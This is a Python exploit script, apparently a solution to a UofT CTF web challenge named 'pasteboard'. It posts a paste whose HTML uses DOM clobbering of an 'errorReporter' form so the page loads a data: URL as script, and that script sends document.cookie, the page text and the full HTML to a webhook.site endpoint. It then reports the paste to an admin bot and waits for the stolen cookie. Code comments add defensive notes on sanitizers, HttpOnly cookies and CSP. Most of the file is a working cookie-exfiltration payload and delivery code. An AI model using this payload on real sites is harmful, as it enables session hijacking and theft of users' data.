import requests
import time

# Challenge instance this script talks to; the hostname points at a UofT CTF
# deployment of the "pasteboard" challenge.
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
# Request-capture endpoint that receives whatever the payload below sends out.
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Markup stored as the paste body. What the string itself contains:
#   * <form id="errorReporter"> with <input name="path">: through the browser's
#     named-element lookup, `errorReporter.path.value` then yields text chosen
#     by the paste author (DOM clobbering), unless the page defines that name
#     itself. No <script> tag is involved.
#   * That value is a data: URL whose JavaScript sends document.cookie, the
#     visible body text and the full document HTML to WEBHOOK.
#   * An <img> with an unloadable src whose onerror handler sets
#     window.lastRenderError and then throws.
# The author expects the flag to be in document.cookie when the bot visits.
# NOTE(review): the page's own script is not part of this file. Presumably it
# loads `errorReporter.path.value` as a script once a render error is
# flagged -- confirm against the challenge source.
# Defensive reading: a sanitizer that keeps id/name attributes leaves
# named-element lookups controllable by the content author; a cookie marked
# HttpOnly is not visible to document.cookie; a CSP script-src that omits
# data: refuses a data: URL loaded as a script.
payload = f'''<form id="errorReporter">
<input name="path" value="data:text/javascript,fetch('{WEBHOOK}?cookies='+document.cookie+'&body='+encodeURIComponent(document.body.innerText)+'&html='+encodeURIComponent(document.documentElement.outerHTML))">
</form>
<img src=x onerror="window.lastRenderError='error';throw new Error()">'''

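# Script flow: store the paste, ask the challenge bot to visit it, then wait
# while the bot's visit shows up on the capture endpoint. Everything below
# performs live HTTP requests against BASE_URL.
print("[*] Creating paste with comprehensive exfiltration payload...")
print(f"[*] Target: {BASE_URL}")
print(f"[*] Webhook: {WEBHOOK}")
print()

# Upper bound per request, so a stalled challenge instance cannot hang the
# script indefinitely (requests has no default timeout).
REQUEST_TIMEOUT = 15  # seconds
# Countdown shown while the bot is expected to visit.
WAIT_SECONDS = 40
WAIT_STEP = 5

# The inspection page uses the same token as the capture URL; derive it from
# WEBHOOK so the two cannot drift apart when the endpoint is replaced.
webhook_token = WEBHOOK.rstrip("/").rsplit("/", 1)[-1]
WEBHOOK_VIEW = f"https://webhook.site/#!/{webhook_token}"

report_resp = None
# The context manager closes the session's pooled connections when done.
with requests.Session() as session:
    # Redirects are not followed: the 302 Location header is the only place
    # this script learns the path of the stored paste.
    resp = session.post(
        f"{BASE_URL}/note/new",
        data={"title": "Flag Exfil", "body": payload},
        allow_redirects=False,
        timeout=REQUEST_TIMEOUT,
    )
    # A 302 without a Location header would otherwise produce a bogus URL
    # ending in "None" and a report for a path that does not exist.
    location = resp.headers.get("Location") if resp.status_code == 302 else None

    if location:
        note_url = f"{BASE_URL}{location}"

        print(f"[+] Paste created: {note_url}")
        print("[*] You can manually test it by visiting the URL above")
        print()

        # Report to bot: the endpoint is given the path from the redirect,
        # not the absolute URL.
        report_resp = session.post(
            f"{BASE_URL}/report",
            data={"url": location},
            timeout=REQUEST_TIMEOUT,
        )

if resp.status_code != 302:
    print(f"[-] Failed to create paste: {resp.status_code}")
    print(resp.text)
elif not location:
    print("[-] Server answered 302 without a Location header; nothing to report")
elif report_resp.status_code == 202:
    print("[+] Successfully reported to bot!")
    print("[*] Bot will visit in a few seconds...")
    print()
    print(f"[*] Check your webhook at: {WEBHOOK_VIEW}")
    print()
    print("[*] What to look for:")
    print("    - GET request with 'cookies' parameter containing the flag")
    print("    - The flag format: uoftctf{...}")
    print()
    print(f"[*] Waiting {WAIT_SECONDS} seconds for bot to visit...")

    for remaining in range(WAIT_SECONDS, 0, -WAIT_STEP):
        print(f"    {remaining} seconds remaining...")
        time.sleep(WAIT_STEP)

    print()
    print("[+] Done! Check webhook now for the flag!")
    print(f"    {WEBHOOK_VIEW}")
else:
    print(f"[-] Failed to report: {report_resp.status_code}")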
